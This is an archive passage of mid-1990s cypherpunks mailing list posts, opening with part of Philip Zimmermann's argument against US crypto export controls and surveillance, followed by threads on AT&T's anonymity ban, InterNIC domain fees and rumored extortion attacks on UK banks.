dozen computers in the country, and assumed that ordinary people 
would never have a need for computers.  Some of the government's 
attitude toward cryptography today were formed in that period, and 
mirrors the old attitudes toward computers.  Why would ordinary 
people need to have access to good cryptography?

In addition to the limited availability of computers, another 
problem with cryptography in those days was that cryptographic 
keys had to be distributed over secure channels so that both 
parties could send encrypted traffic over insecure channels. 
Governments solved that problem by dispatching key couriers with 
satchels handcuffed to their wrists.  Governments could afford to 
send guys like these to their embassies overseas.  But the great 
masses of ordinary people would never have access to practical 
cryptography if keys had to be distributed this way.  No matter 
how cheap and powerful personal computers might someday become, 
you just can't send the keys electronically without the risk of 
interception. This widened the feasibility gap between government 
and personal access to cryptography.

Today, we live in a new world that has had two major breakthroughs 
that have an impact on this state of affairs.  The first is the 
coming of the personal computer and the information age.  The 
second breakthrough is public-key cryptography. 

With the first breakthrough comes cheap ubiquitous personal 
computers, modems, FAX machines, the Internet, E-mail, the World-
Wide Web, digital cellular phones, personal digital assistants 
(PDAs), wireless digital networks, ISDN, cable TV, and the data 
superhighway.  This information revolution is catalyzing the 
emergence of a global economy.

But this renaissance in electronic digital communication brings 
with it a disturbing erosion of our privacy.  In the past, if the 
government wanted to violate the privacy of ordinary citizens, it 
had to expend a certain amount of effort to intercept and steam 
open and read paper mail, and listen to and possibly transcribe 
spoken telephone conversation.  This is analogous to catching fish 
with a hook and a line, one fish at a time.  Fortunately for 
freedom and democracy, this kind of labor-intensive monitoring is 
not practical on a large scale.

Today, electronic mail is gradually replacing conventional paper 
mail, and is soon to be the norm for everyone, not the novelty it 
is today.  Unlike paper mail, E-mail messages are just too easy to 
intercept and scan for interesting keywords.  This can be done 
easily, routinely, automatically, and undetectably on a grand 
scale. This is analogous to driftnet fishing-- making a 
quantitative and qualitative Orwellian difference to the health of 
democracy.

The second breakthrough came in the late 1970s, with the 
mathematics of public key cryptography.  This allows people to 
communicate securely and conveniently with people they've never 
met, with no prior exchange of keys over secure channels.  No more 
special key couriers with black bags.  This, coupled with the 
trappings of the information age, means the great masses of people 
can at last use cryptography.  This new technology also provides 
digital signatures to authenticate transactions and messages, and 
allows for digital money, with all the implications that has for 
an electronic digital economy.  (See appendix)

This convergence of technology-- cheap ubiquitous PCs, modems, 
FAX, digital phones, information superhighways, et cetera-- is all 
part of the information revolution.  Encryption is just simple 
arithmetic to all this digital hardware.  All these devices will 
be using encryption.  The rest of the world uses it, and they 
laugh at the US because we are railing against nature, trying to 
stop it.  Trying to stop this is like trying to legislate the 
tides and the weather. It's like the buggy whip manufacturers 
trying to stop the cars-- even with the NSA and the FBI on their 
side, it's still impossible.  The information revolution is good 
for democracy-- good for a free market and trade. It contributed 
to the fall of the Soviet empire.  They couldn't stop it either.

Today, every off-the-shelf multimedia PC can become a secure voice 
telephone, through the use of freely available software such as 
PGPfone.  When you combine that with the strong political will 
that exists in the American people to have their privacy, it's 
going to require extreme measures to control this technology.  
What does this mean for the government's Clipper chip and key 
escrow systems?

Like every new technology, this comes at some cost.  Cars pollute 
the air and cause traffic jams.  Cryptography can help criminals 
hide their activities.  People in the law enforcement and 
intelligence communities are going to look at this only in their 
own terms.  But even with these costs, we still can't stop this 
from happening in a free market global economy.  Most people I 
talk to outside of government feel that the net result of 
providing privacy will be positive.

Law enforcement and intelligence interests in the government have 
attempted many times to suppress the availability of strong 
domestic encryption technology.  

In 1991, Senate Bill 266 included a non-binding resolution, which 
if it had become real law, would have forced manufacturers of 
secure communications equipment to insert special "trap doors" in 
their products, so that the government could read anyone's 
encrypted messages.  Before that measure was defeated, I wrote and 
released Pretty Good Privacy.  I did it because I wanted 
cryptography to be made available to the American public before it 
became illegal to use it.  I gave it away for free so that it 
would achieve wide dispersal, to inoculate the body politic.

The 1994 Digital Telephony bill mandated that phone companies 
install remote wiretapping ports into their central office digital 
switches, creating a new technology infrastructure for "point-and-
click" wiretapping, so that federal agents no longer have to go 
out and attach alligator clips to phone lines.  Now they'll be 
able to sit in their headquarters in Washington and listen in to 
your phone calls.  Of course, the law still requires a court order 
for a wiretap.  But while technology infrastructures tend to 
persist for generations, laws and policies can change overnight.  
Once a communications infrastructure optimized for surveillance 
becomes entrenched, a shift in political conditions may lead to 
abuse of this new-found power.  Political conditions may shift 
with the election of a new government, or perhaps more abruptly 
from the bombing of a Federal building.

A year after the 1994 Digital Telephony bill passed, the FBI 
disclosed plans to require the phone companies to build into their 
infrastructure the capacity to simultaneously wiretap one percent 
of all phone calls in all major US cities.  This would represent 
more than a thousandfold increase over previous levels in the 
number of phones that could be wiretapped.  In previous years, 
there were only about 1000 court-ordered wiretaps in the US per 
year, at the federal, state, and local levels combined.  It's hard 
to see how the government could even employ enough judges to sign 
enough wiretap orders to wiretap 1% of all our phone calls, much 
less hire enough federal agents to sit and listen to all that 
traffic in real time.  The only plausible way of processing that 
amount of traffic is a massive Orwellian application of automated 
voice recognition technology to sift through it all, searching for 
interesting keywords or searching for a particular speaker's 
voice.  If the government doesn't find the target in the first 1% 
sample, the wiretaps can be shifted over to a different 1% until 
the target is found, or until everyone's phone line has been 
checked for subversive traffic.  The FBI says they need this 
capacity to plan for the future.  This plan sparked such outrage 
that it was defeated in Congress, at least this time around, in 
1995.  But the mere fact that the FBI even asked for these broad 
powers is revealing of their agenda.  And the defeat of this plan 
isn't so reassuring when you consider that the 1994 Digital 
Telephony bill was also defeated the first time it was introduced, 
in 1993.  

Advances in technology will not permit the maintenance of the 
status quo, as far as privacy is concerned.  The status quo is 
unstable.  If we do nothing, new technologies will give the 
government new automatic surveillance capabilities that Stalin 
could never have dreamed of.  The only way to hold the line on 
privacy in the information age is strong cryptography.  
Cryptography strong enough to keep out major governments.

The government has a track record that does not inspire confidence 
that they will never abuse our civil liberties.  The FBI's 
COINTELPRO program targeted groups that opposed government 
policies.  They spied on the anti-war movement and the civil 
rights movement.  They wiretapped Martin Luther King's phone.  
Nixon had his enemies list.  And then there was the Watergate 
mess.  The War on Drugs has given America the world's largest per-
capita incarceration rate in the world, a distinction formerly 
held by South Africa, before we surpassed them during the eighties 
even when apartheid was in full swing.  Recently, we've seen the 
images and sounds of the Rodney King beatings, Detective Mark 
Fuhrman's tapes boasting of police abuses, and the disturbing 
events of the Ruby Ridge case.  And now Congress and the Clinton 
administration seem intent on passing laws curtailing our civil 
liberties on the Internet.  At no time in the past century has 
public distrust of the government been so broadly distributed 
across the political spectrum, as it is today.

The Clinton Administration seems to be attempting to deploy and 
entrench a communications infrastructure that would deny the 
citizenry the ability to protect its privacy.  This is unsettling 
because in a democracy, it is possible for bad people to 
occasionally get elected-- sometimes very bad people.  Normally, a 
well-functioning democracy has ways to remove these people from 
power.  But the wrong technology infrastructure could allow such a 
future government to watch every move anyone makes to oppose it.  
It could very well be the last government we ever elect.

When making public policy decisions about new technologies for the 
government, I think one should ask oneself which technologies 
would best strengthen the hand of a police state.  Then, do not 
allow the government to deploy those technologies.  This is simply 
a matter of good civic hygiene.



In addition to the human rights arguments, there are technological 
reasons why the current export control regime makes no sense 
anymore.

There has been considerable debate about allowing the export of 
implementations of the full 56-bit Data Encryption Standard (DES). 
At an academic cryptography conference in 1993, Michael Wiener of 
Northern Telecom in Ottawa presented a paper on how to crack the 
DES with a special machine.  He has fully designed and tested a 
chip that guesses DES keys at high speed until it finds the right 
one.  Although he has refrained from building the real chips so 
far, he can get these chips manufactured for $10.50 each, and can 
build 57000 of them into a special machine for $1 million that can 
try every DES key in 7 hours, averaging a solution in 3.5 hours.  
$1 million can be hidden in the budget of many companies.  For $10 
million, it takes 21 minutes to crack, and for $100 million, just 
two minutes.  That's full 56-bit DES, cracked in just two minutes.  
I'm sure the NSA can do it in seconds, with their budget.  This 
means that DES is now effectively dead for purposes of serious 
data security applications. If Congress acts now to enable the 
export of full DES products, it will be a day late and a dollar 
short.

Knowledge of cryptography is becoming so widespread, that export 
controls are no longer effective at controlling the spread of this 
technology.  People everywhere can and do write good cryptographic 
software, and we import it here but cannot export it, to the 
detriment of our indigenous software industry.

I wrote PGP from information in the open literature, putting it 
into a convenient package that everyone can use in a desktop or 
palmtop computer.  Then I gave it away for free, for the good of 
democracy.  This could have popped up anywhere, and spread.  Other 
people could have and would have done it.  And are doing it.  
Again and again.  All over the planet.  This technology belongs to 
everybody.


PGP has spread like a prairie fire, fanned by countless people who 
fervently want their privacy restored in the information age.

Today, human rights organizations are using PGP to protect their 
people overseas.  Amnesty International uses it.  The human rights 
group in the American Association for the Advancement of Science 
uses it.  It is used to protect witnesses who report human rights 
abuses in the Balkans, in Burma, in Guatemala, in Tibet.

Some Americans don't understand why I should be this concerned 
about the power of government.  But talking to people in Eastern 
Europe, you don't have to explain it to them.  They already get 
it-- and they don't understand why we don't.

I want to read you a quote from some E-mail I got in October 1993 
from someone in Latvia, on the day that Boris Yeltsin was shelling 
his Parliament building:  

"Phil I wish you to know: let it never be, but if 
dictatorship takes over Russia your PGP is widespread from Baltic 
to Far East now and will help democratic people if necessary.  
Thanks."




 Appendix -- How Public-Key Cryptography Works 

In conventional cryptosystems, such as the US Federal Data 
Encryption Standard (DES), a single key is used for both 
encryption and decryption.  This means that a key must be 
initially transmitted via secure channels so that both parties 
have it before encrypted messages can be sent over insecure 
channels.  This may be inconvenient.  If you have a secure channel 
for exchanging keys, then why do you need cryptography in the 
first place?

In public key cryptosystems, everyone has two related 
complementary keys, a publicly revealed key and a secret key.  
Each key unlocks the code that the other key makes.  Knowing the 
public key does not help you deduce the corresponding secret key.  
The public key can be published and widely disseminated across a 
communications network. This protocol provides privacy without the 
need for the same kind of secure channels that a conventional 
cryptosystem requires.

Anyone can use a recipient's public key to encrypt a message to 
that person, and that recipient uses her own corresponding secret 
key to decrypt that message.  No one but the recipient can decrypt 
it, because no one else has access to that secret key.  Not even 
the person who encrypted the message can decrypt it.  

Message authentication is also provided.  The sender's own secret 
key can be used to encrypt a message, thereby "signing" it.  This 
creates a digital signature of a message, which the recipient (or 
anyone else) can check by using the sender's public key to decrypt 
it.  This proves that the sender was the true originator of the 
message, and that the message has not been subsequently altered by 
anyone else, because the sender alone possesses the secret key 
that made that signature.  Forgery of a signed message is 
infeasible, and the sender cannot later disavow his signature. 

These two processes can be combined to provide both privacy and 
authentication by first signing a message with your own secret 
key, then encrypting the signed message with the recipient's 
public key. The recipient reverses these steps by first decrypting 
the message with her own secret key, then checking the enclosed 
signature with your public key.  These steps are done 
automatically by the recipient's software.



        Philip Zimmermann
        3021 11th Street
        Boulder, Colorado 80304
        303 541-0140
        E-mail:  prz@pgp.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 26 Jun 1996 07:37:32 +0800
To: cypherpunks@toad.com
Subject: Re: Oil Change software snoops through hard drive
Message-ID: <adf5630101021004a745@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:44 AM 6/24/96, Jennifer Mansfield-Jones wrote:

>I thought Alan was implying that Oil Change might be licensed by other
>software vendors, and then supplied as a "service" without warnings.
>For instance, one might purchase the NiftyKeen Win95 graphics editor,
>and find in a footnote on page 58 of the manual that the product will
>automatically update itself unless the user explicitly refuses the
>Customer Convenience Package during installation.
>
>In any case, I don't think it's a bad idea to point out the potential
>problems -- some people just don't notice these things unless the
>implications are spelled out in at least as much detail as the glowing
>marketer fluff.

I certainly agree that airing of issues is useful, and that of course there
is nothing wrong with such discussions.

There is a kind of tension on this list between two points of view, both
ostensibly "privacy-oriented":

1. There are potential privacy problems out there. We need laws to protect
people.

2. There are potential privacy problems out there. People need to protect
themselves.

This tension shows up in the debate about collection of public information
(dossiers), with folks in the #1 camp often arguing for laws restricting
the collection and dissemination of information. Folks in the #2 camp tend
to argue that public information is just that, and that information not
protected by contractual arrangements is, well, just not protected. That if
one doesn't want Fred the Retailer to know one bought a lawn chair, one
should take measures to hide this, that there should not be laws making it
illegal for Fred to make note of this purchase (as that opens all kinds of
cans of worms about inspection of records, etc.).

Anyway, I saw in Alan's remarks the beginnings of a #1 camp position, that
we may need legislation to protect consumers against the evils of Oil
Change. Maybe he did not mean this...he can clarify what he meant, of
course.

To me, Oil Change is a potentially useful service, with controllable
privacy implications. So long as it is voluntary, what's the problem?

I suppose I see many issues in the light of the dichotomy above, and I try
to speak up to make the #2 camp positions whenever I think appropriate.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 26 Jun 1996 07:55:50 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
Message-ID: <adf565df0202100453b8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:35 PM 6/25/96, Hal wrote:

>The wording of this restriction is a bit ambiguous.  Technically if I
>choose to resend someone else's mail I am not transmitting it anonymously
>or under a false name, especially if I make clear what I have done.
>He is anonymous, not I.
....
>If I run an anonymous remailer on my home PC, connecting to WorldNet to
>download the mail, decrypt it, scramble it, and re-send it under my name
>but with a disclaimer attached telling what I have done, I have not
>posted or transmitted anything anonymously or under a false name.  The
>source of the material I choose to transmit, as long as it is legal, is
>not something under AT&T's control.

I agree with Hal's points, but I suspect that these technicalities will be
ignored when the first _complaint_ reaches the DeathStar's administrators.

"Your account has been cancelled."

I suspect other major ISPs will adopt similar language, absent a vocal
lobbying group for anonymous messaging capabilities.

On the other hand, what happens to the AT&T customers who are using
anonymous message services for the "politically correct" uses? Namely, to
post messages to rape support groups, child-abuse groups (so-called
"survivors," in modern PC parlance), and homosexuality groups? Will AT&T
cancel their accounts for hiding under a veil of pseudoanonymity?

(Or just require that their identity be "escrowed"?)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Shifter <shifter@portal.stwing.upenn.edu>
Date: Wed, 26 Jun 1996 03:21:43 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606242105.OAA00824@netcom13.netcom.com>
Message-ID: <199606251353.JAA07632@portal.stwing.upenn.edu>
MIME-Version: 1.0
Content-Type: text


> From cypherpunks-errors@toad.com  Mon Jun 24 22:57:09 1996
> Received: from toad.com (toad.com [140.174.2.1]) by portal.stwing.upenn.edu (8.7.4/8.7.3) with ESMTP id WAA03496 for <shifter@portal.stwing.upenn.edu>; Mon, 24 Jun 1996 22:57:07 -0400
> Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id QAA00890 for cypherpunks-outgoing; Mon, 24 Jun 1996 16:29:06 -0700 (PDT)
> Received: from cygnus.com (cygnus.com [140.174.1.1]) by toad.com (8.7.5/8.7.3) with SMTP id QAA00878 for <cypherpunks@toad.com>; Mon, 24 Jun 1996 16:29:02 -0700 (PDT)
> Received: from netcom13.netcom.com (vznuri@netcom13.netcom.com [192.100.81.125]) by cygnus.com (8.6.12/8.6.9) with ESMTP id OAA21314 for <cypherpunks@toad.com>; Mon, 24 Jun 1996 14:07:22 -0700
> Received: from localhost (vznuri@localhost) by netcom13.netcom.com (8.6.13/Netcom)
> 	id OAA00824; Mon, 24 Jun 1996 14:05:58 -0700
> Message-Id: <199606242105.OAA00824@netcom13.netcom.com>
> To: cypherpunks@toad.com
> cc: vznuri@netcom.com
> Subject: domain name zapping threat by Internic
> Date: Mon, 24 Jun 96 14:05:57 -0700
> From: "Vladimir Z. Nuri" <vznuri@netcom.com>
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> 
[intro deleted]
> 
> I saw in an article a claim, I think, that the internic now charges
> $100 "rent" per year for a domain. this is really amazing to me,
> because this has totally changed from a one-time only fee, if correct.
> is that correct?

There was never a "one-time" fee.  You could register as many domains as
you wanted whenever you wanted (as long as you weren't violating a 
trademark or something like that).  Usually people with domains would run 
into charges because they needed someone else (usually an ISP) to run
authoritative nameservers for their domain.

> 
> I wonder if people are going to try to find a way to "route around"
> this action by the internic... one wonders if this is just the first
> in a series of actions by the new spook owners. (SAIC)  essentially,
> if someone wanted to implement a tax or a way to control the internet,
> the NIC would be an excellent place to start.
> 
> I wonder if the NIC has legal authority to yank DNS address like
> they are doing. it seems one could take them to court and have
> a pretty good argument that people who run DNS servers are free
> to run them however they want, and that ultimately this is what
> determines how routing on the internet is supported, not some
> overseeing agency like the NIC.

Nothing stops anyone from running their own name server.  However, the root
servers are what 99% of the nameservers out there point at.  No one is going
to use dns.joe.schmoe.org as their primary nameserver.


> 
> it seems to me that now would be a brilliant time for someone
> to introduce a "non NIC registration service" that sets up an
> alternate DNS that guarantees that members will never be charged
> money. of course that's what the DNS "sort of" started out as...

And then there could be competition, which could potentially create some
bad scenarios.  What if one registration service refused to propagate their
domains to other registration services?

-- 

Shifter
shifter@portal.stwing.upenn.edu

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzF+qeMAAAEEALdaUpOTi8EtNjZMA9URTXGmQq1NPdyRSx2JXhQ7Q8Yz9qxU
q3tqRtlydRqp37VPmygibGB8eS7RptqolTlYvrVMHXSDcZjKpgpZA9d+3rCKUaLM
F9Hvltl2EafIEspVoNUYahpdXof4oMjs2sKGzJO8aDwyM34pRaicZR8SZJz9AAUR
tClTaGlmdGVyIDxzaGlmdGVyQHBvcnRhbC5zdHdpbmcudXBlbm4uZWR1Pg==
=Eucp
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Wed, 26 Jun 1996 07:32:58 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606242105.OAA00824@netcom13.netcom.com>
Message-ID: <m2688fom8i.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Vladimir" == Vladimir Z Nuri <vznuri@netcom.com> writes:

Vladimir> surprising not to see any discussion on this here..

Vladimir> this is a very intersting development. all kinds of news reports
Vladimir> are talking about the internic zapping 25,000 DNS addresses.
Vladimir> I wonder how this will turn out.

Vladimir> I saw in an article a claim, I think, that the internic now
Vladimir> charges $100 "rent" per year for a domain. this is really
Vladimir> amazing to me, because this has totally changed from a
Vladimir> one-time only fee, if correct.  is that correct?

Not even close.


[ URL ftp://rs.internic.net/templates/domain-template.txt ]        [ 09/95 ]

******************* Please DO NOT REMOVE Version Number ********************

Domain Version Number: 2.0

**************** Please see attached detailed instructions *****************

******** Only for registrations under ROOT, COM, ORG, NET, EDU, GOV ********
 ...
A domain name registration fee of $100.00 US is applicable.  This charge
will cover the $50.00 maintenance fee for two (2) years.  After the two
year period, an invoice will be sent on an annual basis.


If that's not rent, what is?
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Wed, 26 Jun 1996 04:20:35 +0800
To: Nmunro@access.digex.net
Subject: Tales from the UK: Basel Part IV
Message-ID: <199606251406.KAA24757@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


June, 1996: Basel, Switzerland
More on the London Attacks: Part IV

The International Banking Information Technology Forum seemed like an ideal 
location to get a reading on whether the Times' articles held any water or not. 
I sent the family to Germany for two days while I spoke and schmoozed and asked 
some of Europe's and America's top bankers about the articles. (See my last 
three reports [June 1 - 23, 1996] on the alleged attacks as reported in the 
(London) Sunday Times

I browsed and wove in and out of this esteemed financial community and asked 
anyone and everyone in the banking field: "Do you know anything?" "Is any of it 
true?" "Do you know any victims?" "Was your bank attacked?" "Please, tell me!"

Of course I didn't scream this out to all four hundred of the world's top 
bankers in the public forum of my keynote speech; rather I asked quietly and 
discreetly, hoping for a discreet and honest answer. I got lucky and received 
two.

Both people who did agree to speak about the events in question do *not* want to 
be identified. They are both in the very senior ranks of European banking and 
only asked that I do not divulge their companies, their positions, backgrounds 
or names. They both feel that the *real* story should get out - at least as much 
as they know - and that the leaks are inherently good for the banking industry. 
[They do not agree with security by obscurity.] Further, they both told me, at 
separate times during the two day conference, stories that were nigh on 
identical  (and I never told either one that I spoke to the other).

The bottom line is they both know about _four_ 'attacks' against financial 
institutions, although it was unclear as to whether they were all in the UK or 
not. I am left with the distinct impression at least three of them were. [Not 
the 40 or more that the Times suggested or that I have heard about since April 
of 1994.] However, unlike the Times article, there was no question as to the 
method of attack, and both sources were very clear in the use and the meaning of 
the word attack. Here is what they said as to how the technical extortion was 
accomplished. 

The perpetrator(s) would first place a call to the upper management of the 
intended victim announcing his/her intention. "We will take down your bank (or 
financial organization) unless you pay us a lot of money not to." 

The intended victims each sluffed off the threats. Shortly thereafter (within a 
day or two) their financial systems would seemingly collapse for no reason at 
the prescribed time and as promised by the caller. Banking services and/or 
trading would come to a halt, for about an hour or so, and then the affected 
systems would come back on line. Backups were ineffective; typical disaster 
recovery methods, I was told, just didn't work.

Thereafter, a second call would be made to senior executives of the victim 
firms, and the extortion demands for payment made again. In these cases, 
electronic payments to Switzerland were made, and the monies were then secreted 
from their temporary Swiss home within seconds - destined for places unknown or 
unannounced. No repeat attacks to paying institutions has occurred according to 
my sources.

I was told unequivocally that all of the four attacks used the same methodology: 
malicious software was somehow injected into the systems but neither was either 
forthcoming or knowledgeable about the specifics. They specifically denied that 
HERF techniques were used. But many questions remained, and I was unsuccessful 
at getting what I would call good answers to these and more queries:

	- Which systems were affected exactly?
	- How were the backup/redundancies disconnected?
	- Exactly what do you mean by remote control?
	- Did you ever find the offending software?
	- Was it an insider job?
	- Was it pure hacking?
	- Was is mission critical application software gone awry?
	- And so on . . . .

My questions flowed but both people either didn't know the answers or wouldn't 
talk. With both of them, there was a clear discomfort as I pushed and prodded 
for more details. Despite having so many questions still unanswered, I do feel 
fortunate to have found at least two people who were willing to support at least 
aspects of the Times' story.

One of the two banking people in Basel went even  further with detail. He/she 
says the actual dollar figure extorted in these four cases using the software 
techniques, was L63 Million (UK), which is just about US$100 Million. According 
to him/her, a lot of meetings have been taking place amongst the banks and 
financial institutions to deal with the situation but they have agreed and thus 
made a conscious effort to avoid government and law enforcement.

So, no, none of this fully supports the Times' story, but it does support 
aspects of it, and aspects of the rumors and stories I've been hearing since 
April of 1994. No HERF Guns, although another of my contacts who will not let me 
use much of his/her information yet, swears that the software attack stories are 
merely obfuscating the higher technology methods.

I certainly don't know all of the facts, but as more people come forward with 
bits and pieces we may be able to siphon through the maelstrom of noise and 
rumor and find out what's really been going on.

Back at you as soon as I have something more.
Winn


Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mongol@netzone.com
Date: Wed, 26 Jun 1996 08:59:28 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606242105.OAA00824@netcom13.netcom.com>
Message-ID: <31D02762.16A4@netzone.com>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:
> 
> it seems to me that now would be a brilliant time for someone
> to introduce a "non NIC registration service" that sets up an
> alternate DNS that guarantees that members will never be charged
> money. of course that's what the DNS "sort of" started out as...
> 
> sigh.
> 

Hmm, correct me if I'm wrong, but isn't there already a method to bypass the NIC registration fee?  I thought 
one could use the international method for addressing.  You know, something like *.phx.az.us (for a site in 
Phoenix, Arizona, United States).  As far as I know, there isn't the fee that is charged for non location-based 
addressing.  (Although, I'd rather have a regular address)


Ben




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 26 Jun 1996 09:22:42 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
In-Reply-To: <31CEC5B3.7C19@worldnet.att.net>
Message-ID: <Pine.GUL.3.93.960625113555.328B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 24 Jun 1996, WorldNet User wrote:

> AT&T WorldNet service has banned the sending of anonymous email or
> posting anonymously.
> 
> >From the "AT&T WorldNet Service Operating Policies":
> 
> 		(i) Members may not post or transmit any message
> 		anonymously or under a false name. Members may
> 		not permit any other person (other than an agent
> 		acting on Member's behalf and subject to Member's
> 		supervision) to access the Service Member's
> 		account for any purpose.

I don't have a problem with this, actually, and a brief visit to
news.admin.net-abuse.misc would show why. AT&T is selling you access under a
given username. If you send a message traceable to AT&T, they are held
accountable. I think it's reasonable for them to demand that you make
messages traceable to yourself so that you are held accountable. 

If AT&T bans or monitors access to anonymous remailers, then that's a
different kettle of fish entirely, but they're not doing that. The policy
above allows you to send a message to an anonymous remailer under your own
name.

> The no anon rule even beat the no indecency rule, which is second:

I disagree. The below is outrageous.

> 		(ii) Members may not post or transmit any message
>                 which is libelous, defamatory or which discloses
>                 private or personal matters concerning any person.
>                 Members may not post or transmit any message,
>                 data, image or program which is indecent, obscene
>                 or pornographic. 
> 
> http://www.worldnet.att.net/care/terms/#oppol

"Discloses private or personal matters concerning any person"? I guess any
discussion of political figures is out.

-rich
 http://www.c2.org/~rich/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 26 Jun 1996 11:15:05 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: domain name zapping threat by Internic
Message-ID: <199606251954.MAA13366@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:05 PM 6/24/96 -0700, Vlad wrote:
>surprising not to see any discussion on this here..
It's not particularly relevant (:-), but SAIC's position
has been discussed here....

>this is a very intersting development. all kinds of news reports
>are talking about the internic zapping 25,000 DNS addresses.
>I wonder how this will turn out.
>I saw in an article a claim, I think, that the internic now charges
>$100 "rent" per year for a domain. this is really amazing to me,
>because this has totally changed from a one-time only fee, if correct.
>is that correct?

It's not correct.  They charge $50/year (the $100 setup fee for new 
domain names gets you the first two years.)  This gets you the use of the
name plus support from the root-level domain name servers; 
it's how they're trying to fund the NIC instead of getting tax subsidies.  
Before the rent policy started, domain names weren't charged for 
(there's no such thing as a free name server...)  They did a 90-day
grandfathering, but now they're trying to de-grandfather the older names,
and you can tell when you've got to pay from whois.

The legal issues are really unclear, especially since they don't run
all the US-based root name servers, but they'll probably get away with it.
It seems appropriate that organizations calling themselves COMmercial
should pay money for the privilege :-)  They also control the
.org and .net hierarchies.  If you don't like it, you can always
get a statist address in the .us domain or some other .xx government domain,
or find someone who's got a second-level domain that will register you
(e.g. someone may decide to rent out space in .a.com ... .z.com 
cheaper than NSI, or .hardware.com, .software.com, .services.com....)
The NSF is still subsidizing .edu and .gov, and .mil runs its own nameservers.
NSI's contract runs til 1998, which is about enough time to evaluate
alternatives.  .in-addr.arpa is also still "free".

>I wonder if people are going to try to find a way to "route around"
>this action by the internic... 

There are very interesting discussions of the issues in RFC1591 and 
RFC1480.  You _could_ hang off odd places in the .US domain, like
calling yourself a technical school, distributed nationwide institute,
or a generic .GEN.st.US which is used for things like domain name parks
or statewide garden clubs.  But use of top-level domain names and creation
of new ones isn't precluded; it might be interesting if someone wanted
to form a .ALT domain with some automated first-come-first-served registration.

Or you _could_ just live in .in-addr.arpa space if you wanted....

About N years ago, Peter Honeyman started the .fun domain; don't know
if he's still got a nameserver supporting it.

>one wonders if this is just the first in a series of actions by the 
>new spook owners. (SAIC)  essentially,
>if someone wanted to implement a tax or a way to control the internet,
>the NIC would be an excellent place to start.

They may have contracts with spooky people, but it doesn't really
give them a lot of control, especially since you can always get yourself
a domain name from some friendly country like Anguilla or Lichtenstein
(a high-tech equivalent of fancy postage stamps? :-)
It's more interesting to speculate on what they can do with .in-addr.arpa.

However, because the DNS root-level servers only hand out addresses,
rather than carrying your mail, it doesn't provide much opportunity
for wiretaps or other Un-American Activity.  They could do a bit of
traffic analysis (seeing which IP addresses request info for which
domain names), but it's really sparse traffic information - they're
mainly getting requests that have filtered through other nameservers
(especially if you point your systems at some caching nameserver like 
netcom's or aol's which tells them that one of 5 million users wanted
to know the address for .suspicious.com), and caching nameservers
mean that multiple requests for the same information generally won't
hit the root servers.  The take is further reduced if suspicious
machines are third-level addresses under either privacy-protecting
second-levels (suspicious.alias.net) or large ones (suspicious.big-isp.net)
which will get the queries instead of the root servers.





#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Distract Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herr Wendigo <wendigo@gti.net>
Date: Wed, 26 Jun 1996 08:20:42 +0800
To: shifter@portal.stwing.upenn.edu (Shifter)
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606251353.JAA07632@portal.stwing.upenn.edu>
Message-ID: <199606251728.NAA14126@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


